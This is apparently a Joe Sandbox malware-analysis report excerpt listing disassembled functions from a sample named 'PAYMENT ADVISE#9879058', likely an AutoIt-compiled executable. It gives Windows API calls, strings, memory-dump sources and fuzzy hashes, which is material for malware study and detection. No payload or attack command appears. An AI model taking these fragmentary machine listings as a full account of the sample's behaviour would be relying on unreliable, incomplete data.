                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Load$Image_wcslen$__wcsicoll$IconLibraryMessageSend$DestroyExtractFreeMoveWindow__wcsicmp_l
                          • String ID: .dll$.exe$.icl
                          • API String ID: 2511167534-1154884017
                          • Opcode ID: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                          • Instruction ID: 777b7c61fe84a0ac0f88e3bb9536c5d4e291b97e4b5026f6b39318954af55ba4
                          • Opcode Fuzzy Hash: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                          • Instruction Fuzzy Hash: D461D9711043016AE620DF659D85F7B73ECEF84B0AF00481EFE81D5182E7B9A989C77A
                          Function 00436B3A Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 190COMMON
                          Download Yara Rule
                          APIs
                          • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00436B4E
                          • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000), ref: 00436B73
                          • _wcslen.LIBCMT ref: 00436B79
                          • _wcscpy.LIBCMT ref: 00436B9F
                          • _wcscat.LIBCMT ref: 00436BC0
                          • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00436BE7
                          • _wcscat.LIBCMT ref: 00436C2A
                          • _wcscat.LIBCMT ref: 00436C31
                          • __wcsicoll.LIBCMT ref: 00436C4B
                          • _wcsncpy.LIBCMT ref: 00436C62
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                          • API String ID: 1503153545-1459072770
                          • Opcode ID: 008cb01cbb675dac6eb9866d49a054c7095339c3b591b4350c6f773ace1c370f
                          • Instruction ID: f4118b49cd66f9fee818cdfc0bae26735a4a754b0a3131160812af9443992caa
                          • Opcode Fuzzy Hash: 008cb01cbb675dac6eb9866d49a054c7095339c3b591b4350c6f773ace1c370f
                          • Instruction Fuzzy Hash: B54115B264020137D200B7269C83EFF735CDE99715F54091FFE45A2253FA2EA69642BE
                          Function 00452788 Relevance: 34.8, APIs: 23, Instructions: 344COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 004431E0: __time64.LIBCMT ref: 004431EA
                          • _fseek.LIBCMT ref: 004527FC
                          • __wsplitpath.LIBCMT ref: 0045285C
                          • _wcscpy.LIBCMT ref: 00452871
                          • _wcscat.LIBCMT ref: 00452886
                          • __wsplitpath.LIBCMT ref: 004528B0
                          • _wcscat.LIBCMT ref: 004528C8
                          • _wcscat.LIBCMT ref: 004528DD
                          • __fread_nolock.LIBCMT ref: 00452914
                          • __fread_nolock.LIBCMT ref: 00452925
                          • __fread_nolock.LIBCMT ref: 00452944
                          • __fread_nolock.LIBCMT ref: 00452955
                          • __fread_nolock.LIBCMT ref: 00452976
                          • __fread_nolock.LIBCMT ref: 00452987
                          • __fread_nolock.LIBCMT ref: 00452998
                          • __fread_nolock.LIBCMT ref: 004529A9
                            • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                            • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                            • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                            • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                            • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
                            • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
                            • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
                          • __fread_nolock.LIBCMT ref: 00452A39
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                          • String ID:
                          • API String ID: 2054058615-0
                          • Opcode ID: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
                          • Instruction ID: 66779ec6e5012556871fefb3c18d5d4f0449fb8b445ab61f685bb60241e2a5ae
                          • Opcode Fuzzy Hash: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
                          • Instruction Fuzzy Hash: 16C14EB2508340ABD320DF65C881EEBB7E8EFC9714F444D2FF68987241E6799544CBA6
                          Function 004559A8 Relevance: 33.7, APIs: 18, Strings: 1, Instructions: 401COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID:
                          • String ID: 0
                          • API String ID: 0-4108050209
                          • Opcode ID: 0476511f06c615c4519fb5d0bdcf97e6c9114ef5bab3d74fcb2069946f87bde7
                          • Instruction ID: a4e6889c8706d2a682ad3cc8acca51b009283e1ae9b51da70db0806919efebf9
                          • Opcode Fuzzy Hash: 0476511f06c615c4519fb5d0bdcf97e6c9114ef5bab3d74fcb2069946f87bde7
                          • Instruction Fuzzy Hash: 95C104723403416BF3209B64DC46FBBB794EB95321F04453FFA45D62C1EBBA9409876A
                          Function 004700B0 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                          • GetWindowRect.USER32(?,?), ref: 004701EA
                          • GetClientRect.USER32(?,?), ref: 004701FA
                          • GetSystemMetrics.USER32(00000007), ref: 00470202
                          • GetSystemMetrics.USER32(00000008), ref: 00470216
                          • GetSystemMetrics.USER32(00000004), ref: 00470238
                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047026B
                          • GetSystemMetrics.USER32(00000007), ref: 00470273
                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004702A0
                          • GetSystemMetrics.USER32(00000008), ref: 004702A8
                          • GetSystemMetrics.USER32(00000004), ref: 004702CF
                          • SetRect.USER32(?,00000000,00000000,?,?), ref: 004702F1
                          • AdjustWindowRectEx.USER32(?,?,00000000,000000FF), ref: 00470304
                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 0047033E
                          • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00470356
                          • GetClientRect.USER32(?,?), ref: 00470371
                          • GetStockObject.GDI32(00000011), ref: 00470391
                          • SendMessageW.USER32(?,00000030,00000000), ref: 0047039D
                          • SetTimer.USER32(00000000,00000000,00000028,Function_00061E7F), ref: 004703C4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                          • String ID: AutoIt v3 GUI
                          • API String ID: 867697134-248962490
                          • Opcode ID: 2f3c1093d205cc919e8fce6edce52452572e464071e7d7185a704cd66ddcb838
                          • Instruction ID: 96ed3905d942d8c5c267f8207effb08aff50268186fc7250a269a1908d1679c9
                          • Opcode Fuzzy Hash: 2f3c1093d205cc919e8fce6edce52452572e464071e7d7185a704cd66ddcb838
                          • Instruction Fuzzy Hash: 27B19F71205301AFD324DF68DD45B6BB7E4FB88710F108A2EFA9587290DBB5E844CB5A
                          Function 00448759 Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 311COMMON
                          Download Yara Rule
                          APIs
                          • SetWindowPos.USER32(004A83D8,00000000,00000000,00000000,00000000,00000000,00000013,004A83D8,?,?), ref: 0044880A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Window
                          • String ID: 0
                          • API String ID: 2353593579-4108050209
                          • Opcode ID: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                          • Instruction ID: 13976ff69904029c6bcd7d6129a783336058688c161485e0dcc644b2654616cc
                          • Opcode Fuzzy Hash: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                          • Instruction Fuzzy Hash: 94B19DB02443419FF324CF14C889BABBBE4EB89744F14491EF991972D1DBB8E845CB5A
                          Function 0044A0EA Relevance: 31.7, APIs: 21, Instructions: 196windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetSysColor.USER32 ref: 0044A11D
                          • GetClientRect.USER32(?,?), ref: 0044A18D
                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A1A6
                          • GetWindowDC.USER32(?), ref: 0044A1B3
                          • GetPixel.GDI32(00000000,?,?), ref: 0044A1C6
                          • ReleaseDC.USER32(?,00000000), ref: 0044A1D6
                          • GetSysColor.USER32(0000000F), ref: 0044A1EC
                          • GetWindowLongW.USER32(?,000000F0), ref: 0044A207
                          • GetSysColor.USER32(0000000F), ref: 0044A216
                          • GetSysColor.USER32(00000005), ref: 0044A21E
                          • GetWindowDC.USER32 ref: 0044A277
                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A28A
                          • GetPixel.GDI32(00000000,?,00000000), ref: 0044A29F
                          • GetPixel.GDI32(00000000,00000000,?), ref: 0044A2B4
                          • GetPixel.GDI32(00000000,?,?), ref: 0044A2D0
                          • ReleaseDC.USER32(?,00000000), ref: 0044A2D8
                          • SetTextColor.GDI32(00000000,?), ref: 0044A2F6
                          • SetBkMode.GDI32(00000000,00000001), ref: 0044A30A
                          • GetStockObject.GDI32(00000005), ref: 0044A312
                          • SetBkColor.GDI32(00000000,00000000), ref: 0044A328
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                          • String ID:
                          • API String ID: 1744303182-0
                          • Opcode ID: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                          • Instruction ID: f407f88e1fc9bdd08975b2e96734b256c85d8f08b0ead5e1f8dbf5832e348edb
                          • Opcode Fuzzy Hash: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                          • Instruction Fuzzy Hash: AD6148315442016BE3209B388C88BBFB7A4FB49324F54079EF9A8973D0D7B99C51D76A
                          Function 0046884B Relevance: 31.6, APIs: 6, Strings: 12, Instructions: 113COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: __wcsicoll$__wcsnicmp
                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                          • API String ID: 790654849-1810252412
                          • Opcode ID: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
                          • Instruction ID: 1b62209f2aa4de5792947d5a3aa61dcd1c874d3672784017b8f4b2c72f71c34c
                          • Opcode Fuzzy Hash: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
                          • Instruction Fuzzy Hash: 7A3193B1644301A7CA00FA61DC83F5B73A85F54759F100A3FB955B61D6FA6CEA0C862F
                          Function 00476A8A Relevance: 27.3, APIs: 18, Instructions: 332COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: InitVariant
                          • String ID:
                          • API String ID: 1927566239-0
                          • Opcode ID: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                          • Instruction ID: b17386a2766a1a739d91313a8bf0106a5dd250ff49ec0cac6ee5761d63536315
                          • Opcode Fuzzy Hash: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                          • Instruction Fuzzy Hash: 87A1F5766146019FC300EF65D88499FB7AAFF85315F408D3EFA49C3211D77AD4098BAA
                          Function 0046D6EB Relevance: 26.7, APIs: 6, Strings: 9, Instructions: 474COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                          • GetForegroundWindow.USER32(?,?), ref: 0046D7C1
                          • GetForegroundWindow.USER32 ref: 0046DBA4
                          • IsWindow.USER32(?), ref: 0046DBDE
                          • GetDesktopWindow.USER32 ref: 0046DCB5
                          • EnumChildWindows.USER32(00000000), ref: 0046DCBC
                          • EnumWindows.USER32(00460772,?), ref: 0046DCC4
                            • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Window$EnumForegroundWindows_wcslen$ChildDesktop
                          • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                          • API String ID: 1322021666-1919597938
                          • Opcode ID: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                          • Instruction ID: 252cd24da08a8cddfda52e39780f3f39bafd894638fb43d2866a45805a666b3e
                          • Opcode Fuzzy Hash: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                          • Instruction Fuzzy Hash: 96F1C571D143409BCB00EF61C881EAB73A4BF95308F44496FF9456B286E77DE909CB6A
                          Function 0045DE12 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 190timeCOMMON
                          Download Yara Rule
                          APIs
                          • GetLocalTime.KERNEL32(?), ref: 0045DED4
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 0045DEE4
                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0045DEF0
                          • _wcsncpy.LIBCMT ref: 0045DF0F
                          • __wsplitpath.LIBCMT ref: 0045DF54
                          • _wcscat.LIBCMT ref: 0045DF6C
                          • _wcscat.LIBCMT ref: 0045DF7E
                          • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0045DF93
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFA7
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFE5
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFFB
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0045E00D
                          • _wcscpy.LIBCMT ref: 0045E019
                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0045E05F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: CurrentDirectory$Time$File$Local_wcscat$System__wsplitpath_wcscpy_wcsncpy
                          • String ID: *.*
                          • API String ID: 3201719729-438819550
                          • Opcode ID: 89541da3f554ebb8d42e95f45bc66f31ca584aff69b040987f949bd9346ecb30
                          • Instruction ID: 9ef8ac46b2ec3f8a2b66e183c5d6435db2730cdd54c1860218fefef83dfd89d7
                          • Opcode Fuzzy Hash: 89541da3f554ebb8d42e95f45bc66f31ca584aff69b040987f949bd9346ecb30
                          • Instruction Fuzzy Hash: D061A7B25043049BC724EF65C881E9FB3E8AF94704F048E1EF98987241DB79E949CB96
                          Function 0043737D Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 83windowCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: __wcsicoll$IconLoad
                          • String ID: blank$info$question$stop$warning
                          • API String ID: 2485277191-404129466
                          • Opcode ID: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                          • Instruction ID: 3fdcc892c2a25cebf9aff257507665a297d4e16c4260cb8f6e9492a672fb13e0
                          • Opcode Fuzzy Hash: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                          • Instruction Fuzzy Hash: CB2128B6B08301A7D610A725BC05FDF27489FA8365F004C2BF941E2283F3A8A45583BD
                          Function 00428604 Relevance: 25.8, APIs: 17, Instructions: 306stringCOMMON
                          Download Yara Rule
                          APIs
                          • CompareStringW.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428611
                          • GetLastError.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428627
                          • strncnt.LIBCMT ref: 00428646
                          • strncnt.LIBCMT ref: 0042865A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: strncnt$CompareErrorLastString
                          • String ID:
                          • API String ID: 1776594460-0
                          • Opcode ID: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
                          • Instruction ID: 056e5a993d73ec50dc3c8e072878bb631c9b69e1f80941a2a69bbd8adeb14d7f
                          • Opcode Fuzzy Hash: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
                          • Instruction Fuzzy Hash: 0DA1B131B01225AFDF219F61EC41AAF7BB6AF94340FA4402FF81196251DF3D8891CB58
                          Function 004545C9 Relevance: 25.7, APIs: 17, Instructions: 198windowtimeCOMMON
                          Download Yara Rule
                          APIs
                          • LoadIconW.USER32(?,00000063), ref: 004545DA
                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004545EC
                          • SetWindowTextW.USER32(?,?), ref: 00454606
                          • GetDlgItem.USER32(?,000003EA), ref: 0045461F
                          • SetWindowTextW.USER32(00000000,?), ref: 00454626
                          • GetDlgItem.USER32(?,000003E9), ref: 00454637
                          • SetWindowTextW.USER32(00000000,?), ref: 0045463E
                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00454663
                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 0045467D
                          • GetWindowRect.USER32(?,?), ref: 00454688
                          • SetWindowTextW.USER32(?,?), ref: 004546FD
                          • GetDesktopWindow.USER32 ref: 00454708
                          • GetWindowRect.USER32(00000000), ref: 0045470F
                          • MoveWindow.USER32(?,?,00000000,?,?,00000000), ref: 00454760
                          • GetClientRect.USER32(?,?), ref: 0045476F
                          • PostMessageW.USER32(?,00000005,00000000,?), ref: 0045479E
                          • SetTimer.USER32(?,0000040A,?,00000000), ref: 004547E9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                          • String ID:
                          • API String ID: 3869813825-0
                          • Opcode ID: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                          • Instruction ID: 4e77de65cc6986e78e6be143d0a4b9e7f39e78804b6f4fc71fe9e35dfcfd5046
                          • Opcode Fuzzy Hash: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                          • Instruction Fuzzy Hash: 8C616D71604701AFD320DF68CD88F2BB7E8AB88709F004E1DF98697691D7B8E849CB55
                          Function 00458D1C Relevance: 25.6, APIs: 17, Instructions: 112COMMON
                          Download Yara Rule
                          APIs
                          • LoadCursorW.USER32(00000000,00007F8A), ref: 00458D2D
                          • LoadCursorW.USER32(00000000,00007F00), ref: 00458D3A
                          • LoadCursorW.USER32(00000000,00007F03), ref: 00458D47
                          • LoadCursorW.USER32(00000000,00007F8B), ref: 00458D54
                          • LoadCursorW.USER32(00000000,00007F01), ref: 00458D61
                          • LoadCursorW.USER32(00000000,00007F81), ref: 00458D6E
                          • LoadCursorW.USER32(00000000,00007F88), ref: 00458D7B
                          • LoadCursorW.USER32(00000000,00007F80), ref: 00458D88
                          • LoadCursorW.USER32(00000000,00007F86), ref: 00458D95
                          • LoadCursorW.USER32(00000000,00007F83), ref: 00458DA2
                          • LoadCursorW.USER32(00000000,00007F85), ref: 00458DAF
                          • LoadCursorW.USER32(00000000,00007F82), ref: 00458DBC
                          • LoadCursorW.USER32(00000000,00007F84), ref: 00458DC9
                          • LoadCursorW.USER32(00000000,00007F04), ref: 00458DD6
